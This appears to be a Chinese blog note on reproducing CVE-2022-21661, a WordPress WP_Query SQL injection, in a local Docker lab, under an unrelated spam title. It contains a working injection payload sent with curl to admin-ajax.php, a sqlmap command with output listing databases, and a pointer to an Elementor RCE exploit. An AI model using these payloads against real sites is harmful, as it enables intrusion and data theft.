网站项目规划与设计方案_小程序招商_北京软件培训机构前十名_推动高质量发展

cd /tmp;
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
apt  install -y docker-compose  &
docker pull mysql:5.7 ;docker pull  wordpress:5.8.1 ; docker pull  wordpress:cli;root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii  docker-compose                       1.29.2-1                                all          define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# 

自定义docker-compose.yml  ,自己修改后的就叫:Gdocker-compose.yml

version: "3.3"
services:db:image: mysql:5.7volumes:- db_data:/var/lib/mysqlports:- 33060:3306restart: alwaysenvironment:MYSQL_ROOT_PASSWORD: somewordpressMYSQL_DATABASE: wordpressMYSQL_USER: wordpressMYSQL_PASSWORD: wordpresshealthcheck:test: mysqladmin ping -h 127.0.0.1 -u $MYSQL_USER --password=$MYSQL_PASSWORDstart_period: 5sinterval: 5stimeout: 5sretries: 55wordpress:depends_on:db:condition: service_healthyimage: wordpress:5.8.1ports:- 8000:80restart: alwaysenvironment:WORDPRESS_DB_HOST: db:3306WORDPRESS_DB_NAME: wordpressWORDPRESS_DB_USER: wordpressWORDPRESS_DB_PASSWORD: wordpressWORDPRESS_TABLE_PREFIX: "wp_"WORDPRESS_DEBUG: 1volumes:- wp_data:/var/www/htmlwordpress-cli:depends_on:- db- wordpressimage: wordpress:cliuser: rootstdin_open: true tty: trueenvironment:WORDPRESS_DB_HOST: db:3306WORDPRESS_DB_NAME: wordpressWORDPRESS_DB_USER: wordpressWORDPRESS_DB_PASSWORD: wordpresscommand: >/bin/sh -c 'id;cat /etc/hosts;ip add;sleep 3;wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;wp --allow-root plugin install elementor  --version=3.5.0  --activate;wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;wp --allow-root theme install hello-elementor --version=2.5.0 --activate;wp --allow-root user create tom tom@tom.com          --user_pass="weakpassword";wp --allow-root user create leo leo@leo.com          --user_pass="strongpassword";wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";chown -R 33:33 /var/www/html;chmod -R 0777 /var/www/html;cat /etc/passwd;wp config set WP_DEBUG true --raw --allow-root;wp config set WP_DEBUG_LOG true --raw --allow-root;wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;wp config set WP_DEBUG_DISPLAY true --raw --allow-root;bash;'volumes:- wp_data:/var/www/htmlvolumes:db_data:wp_data:

wp --allow-root plugin install elementor  --version=3.6.2  --activate;

这个3.6.2版本也是可以的,况且存在这个漏洞,可以一起测试

#https://www.exploit-db.com/exploits/50882 
#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)

启动3个docker:

docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml  up -d 

查看日志:

docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;

mysql容器连接测试:

docker exec -it  ssi-cve-2022-21661_db_1  bashmysql  -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"

使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):

curl -x http://127.0.0.1:8080/  -i --compressed -k -X $'POST' \-H $'Host: 127.0.0.1:8000' -H $'User-Agent: python-requests/2.28.1' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Content-Length: 287' -H $'Content-Type: application/x-www-form-urlencoded' \--data-binary $'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \$'http://127.0.0.1:8000/wp-admin/admin-ajax.php'

http://127.0.0.1:8080/  是burpsuite 2022起的http代理,方便观察.

祭出大杀器sqlmap:

set cmdpath2024=c:\Python310\python%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="23)  " --suffix="#" --threads=4  --current-db --is-dba --dbs  --proxy=http://127.0.0.1:8080# sqlmap  {1.6.2.4#dev}   ,  支持python3.10

rr2024.txt如下:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: closeaction=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}

得到结果:

web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress

其它辅助参考资料:

https://github.com/daniel616/CVE-2022-21661-Demo#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zipcd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.1.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.5.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.7.0.ziphttps://forum.butian.net/share/1324
漏洞简介
这是最近爆出来的一个 wordpress 的 SQL注入漏洞，实际上不是一个可以直接利用的洞，而是wordpress的一个核心函数 WP_Query的漏洞，这个函数常被插件使用，因此能造成的危害也挺大，前台后台都有可能。